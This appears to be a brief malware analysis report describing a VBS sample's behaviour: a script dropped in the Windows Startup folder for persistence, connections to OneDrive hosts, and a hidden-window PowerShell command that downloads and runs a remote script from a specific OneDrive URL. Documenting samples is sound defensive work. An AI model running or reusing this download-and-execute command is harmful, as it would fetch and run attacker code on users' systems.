Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ dddd.vbs
- 'on####ve.live.com':443
- '5g####.#n.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK 5g####.#n.files.1drv.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://onedrive.live.com/download?cid=976A4CF3786BA4FD&resid=976A4CF3786BA4FD%21108&authkey=AHyYadbK9jLCnwY')' (with hidden window)
- '<SYSTEM32>\wscript.exe' "<PATH_SAMPLE>.vbs" /elevate
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://onedrive.live.com/download?cid=976A4CF3786BA4FD&resid=976A4CF3786BA4FD%21108&authkey=AHyYadbK9jLCnwY')